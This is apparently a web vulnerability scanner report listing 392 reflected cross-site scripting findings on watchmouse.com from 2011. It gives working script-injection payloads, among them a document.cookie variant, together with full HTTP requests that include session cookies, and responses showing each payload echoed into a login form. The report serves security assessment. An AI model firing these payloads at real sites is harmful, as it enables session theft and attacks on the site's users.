1.362. http://www.watchmouse.com/pt/plans_price.php [name of an arbitrarily supplied request parameter]

1.363. http://www.watchmouse.com/pt/register.php [REST URL parameter 1]

1.364. http://www.watchmouse.com/pt/register.php [REST URL parameter 2]

1.365. http://www.watchmouse.com/pt/register.php [name of an arbitrarily supplied request parameter]

1.366. http://www.watchmouse.com/pubstatus.php [REST URL parameter 1]

1.367. http://www.watchmouse.com/pubstatus.php [name of an arbitrarily supplied request parameter]

1.368. http://www.watchmouse.com/settings.php [REST URL parameter 1]

1.369. http://www.watchmouse.com/settings.php [name of an arbitrarily supplied request parameter]

1.370. http://www.watchmouse.com/sv/ [3d071%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E03249d204b0 parameter]

1.371. http://www.watchmouse.com/sv/ [REST URL parameter 1]

1.372. http://www.watchmouse.com/sv/ [name of an arbitrarily supplied request parameter]

1.373. http://www.watchmouse.com/sv/feature/public-status-page.html [REST URL parameter 1]

1.374. http://www.watchmouse.com/sv/feature/public-status-page.html [REST URL parameter 2]

1.375. http://www.watchmouse.com/sv/feature/public-status-page.html [REST URL parameter 3]

1.376. http://www.watchmouse.com/sv/feature/transaction-monitoring-web-application-testing.html [REST URL parameter 1]

1.377. http://www.watchmouse.com/sv/feature/transaction-monitoring-web-application-testing.html [REST URL parameter 2]

1.378. http://www.watchmouse.com/sv/feature/transaction-monitoring-web-application-testing.html [REST URL parameter 3]

1.379. http://www.watchmouse.com/sv/feature/transaction-monitoring-web-application-testing.html [name of an arbitrarily supplied request parameter]

1.380. http://www.watchmouse.com/sv/learn_more.php [REST URL parameter 1]

1.381. http://www.watchmouse.com/sv/learn_more.php [REST URL parameter 2]

1.382. http://www.watchmouse.com/sv/learn_more.php [name of an arbitrarily supplied request parameter]

1.383. http://www.watchmouse.com/sv/plans_price.php [REST URL parameter 1]

1.384. http://www.watchmouse.com/sv/plans_price.php [REST URL parameter 2]

1.385. http://www.watchmouse.com/sv/plans_price.php [name of an arbitrarily supplied request parameter]

1.386. http://www.watchmouse.com/sv/register.php [REST URL parameter 1]

1.387. http://www.watchmouse.com/sv/register.php [REST URL parameter 2]

1.388. http://www.watchmouse.com/sv/register.php [name of an arbitrarily supplied request parameter]

1.389. http://www.watchmouse.com/trial.php [REST URL parameter 1]

1.390. http://www.watchmouse.com/trial.php [name of an arbitrarily supplied request parameter]

1.391. http://www.watchmouse.com/worldwide.php [REST URL parameter 1]

1.392. http://www.watchmouse.com/worldwide.php [name of an arbitrarily supplied request parameter]



1. Cross-site scripting (reflected)
There are 392 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Issue remediation

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:

In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


1.1. http://www.watchmouse.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9dda5"><script>alert(1)</script>6abf1d1d559 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /?9dda5"><script>alert(1)</script>6abf1d1d559=1 HTTP/1.1
Host: www.watchmouse.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utma=165779128.2111935903.1297196240.1297196240.1297196240.1

Response (redirected)

HTTP/1.1 200 OK
Date: Wed, 09 Feb 2011 12:06:39 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified:
ETag: "0-en-e30de4188d70908675753b87c9b948c2"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 17963

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/?9dda5"><script>alert(1)</script>6abf1d1d559=1" method="post">
...[SNIP]...

1.2. http://www.watchmouse.com/assets/css/chat.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /assets/css/chat.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d4284"><script>alert(1)</script>9c72a01d555 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /assetsd4284"><script>alert(1)</script>9c72a01d555/css/chat.css HTTP/1.1
Host: www.watchmouse.com
Proxy-Connection: keep-alive
Referer: http://www.watchmouse.com/en/chat.php
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.8.10.1297252772

Response (redirected)

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:06:38 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified:
ETag: "0-en-4e9aa03e6ffc382c1ac3db0784cd338d"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 13118

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/assetsd4284"><script>alert(1)</script>9c72a01d555/css/chat.css" method="post">
...[SNIP]...

1.3. http://www.watchmouse.com/assets/css/chat.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /assets/css/chat.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload acfba"><script>alert(1)</script>011585907e4 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /assets/cssacfba"><script>alert(1)</script>011585907e4/chat.css HTTP/1.1
Host: www.watchmouse.com
Proxy-Connection: keep-alive
Referer: http://www.watchmouse.com/en/chat.php
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.8.10.1297252772

Response (redirected)

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:06:54 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified:
ETag: "0-en-23228c3cf68c27478046198de94dbd71"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 13118

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/assets/cssacfba"><script>alert(1)</script>011585907e4/chat.css" method="post">
...[SNIP]...

1.4. http://www.watchmouse.com/assets/css/chat.css [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /assets/css/chat.css

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c4494"><script>alert(1)</script>3072aa18942 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /assets/css/chat.cssc4494"><script>alert(1)</script>3072aa18942 HTTP/1.1
Host: www.watchmouse.com
Proxy-Connection: keep-alive
Referer: http://www.watchmouse.com/en/chat.php
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.8.10.1297252772

Response (redirected)

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:07:11 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified:
ETag: "0-en-d8b3c5fcfb4be8a12a3c1310592e17ef"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 13118

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/assets/css/chat.cssc4494"><script>alert(1)</script>3072aa18942" method="post">
...[SNIP]...

1.5. http://www.watchmouse.com/assets/css/fancybox.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /assets/css/fancybox.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 171ad"><script>alert(1)</script>49251d16df7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /assets171ad"><script>alert(1)</script>49251d16df7/css/fancybox.css HTTP/1.1
Host: www.watchmouse.com
Proxy-Connection: keep-alive
Referer: http://www.watchmouse.com/en/plans_price.php
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.1.10.1297252772

Response (redirected)

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:06:38 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified:
ETag: "0-en-70b22df926a6b5795c7aefc23fcb19bd"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 13154

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/assets171ad"><script>alert(1)</script>49251d16df7/css/fancybox.css" method="post">
...[SNIP]...

1.6. http://www.watchmouse.com/assets/css/fancybox.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /assets/css/fancybox.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b0665"><script>alert(1)</script>331d75dd070 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /assets/cssb0665"><script>alert(1)</script>331d75dd070/fancybox.css HTTP/1.1
Host: www.watchmouse.com
Proxy-Connection: keep-alive
Referer: http://www.watchmouse.com/en/plans_price.php
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.1.10.1297252772

Response (redirected)

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:06:53 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified:
ETag: "0-en-4cb1330944af7a01439ef6f36b612d19"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 13154

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/assets/cssb0665"><script>alert(1)</script>331d75dd070/fancybox.css" method="post">
...[SNIP]...

1.7. http://www.watchmouse.com/assets/css/fancybox.css [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /assets/css/fancybox.css

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2ca9c"><script>alert(1)</script>5b062acde4 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /assets/css/fancybox.css2ca9c"><script>alert(1)</script>5b062acde4 HTTP/1.1
Host: www.watchmouse.com
Proxy-Connection: keep-alive
Referer: http://www.watchmouse.com/en/plans_price.php
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.1.10.1297252772

Response (redirected)

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:07:03 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified:
ETag: "0-en-39de29d75eca7df5c03ad50c589e343e"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 13145

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/assets/css/fancybox.css2ca9c"><script>alert(1)</script>5b062acde4" method="post">
...[SNIP]...

1.8. http://www.watchmouse.com/assets/css/print.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /assets/css/print.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a034c"><script>alert(1)</script>9f891514c4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /assetsa034c"><script>alert(1)</script>9f891514c4/css/print.css?20101008 HTTP/1.1
Host: www.watchmouse.com
Proxy-Connection: keep-alive
Referer: http://www.watchmouse.com/en/plans_price.php
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.1.10.1297252772

Response (redirected)

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 11:59:49 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified:
ETag: "0-en-f4b14ef24fd185b6a7028954c01c369b"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 13199

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/assetsa034c"><script>alert(1)</script>9f891514c4/css/print.css?20101008" method="post">
...[SNIP]...

1.9. http://www.watchmouse.com/assets/css/print.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /assets/css/print.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8303e"><script>alert(1)</script>53626a66573 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /assets/css8303e"><script>alert(1)</script>53626a66573/print.css?20101008 HTTP/1.1
Host: www.watchmouse.com
Proxy-Connection: keep-alive
Referer: http://www.watchmouse.com/en/plans_price.php
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.1.10.1297252772

Response (redirected)

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 11:59:54 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified:
ETag: "0-en-73a1c84daad1dd136c7864cbe222e92c"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 13208

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/assets/css8303e"><script>alert(1)</script>53626a66573/print.css?20101008" method="post">
...[SNIP]...

1.10. http://www.watchmouse.com/assets/css/print.css [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /assets/css/print.css

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 74725"><script>alert(1)</script>a742c99b4ff was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /assets/css/print.css74725"><script>alert(1)</script>a742c99b4ff?20101008 HTTP/1.1
Host: www.watchmouse.com
Proxy-Connection: keep-alive
Referer: http://www.watchmouse.com/en/plans_price.php
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.1.10.1297252772

Response (redirected)

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 11:59:57 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified:
ETag: "0-en-57a0127f294315b215c2b50e29f870d4"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 13208

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/assets/css/print.css74725"><script>alert(1)</script>a742c99b4ff?20101008" method="post">
...[SNIP]...

1.11. http://www.watchmouse.com/assets/css/screen.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /assets/css/screen.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1c1dc"><script>alert(1)</script>f828aa78b0b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /assets1c1dc"><script>alert(1)</script>f828aa78b0b/css/screen.css?20101008 HTTP/1.1
Host: www.watchmouse.com
Proxy-Connection: keep-alive
Referer: http://www.watchmouse.com/en/plans_price.php
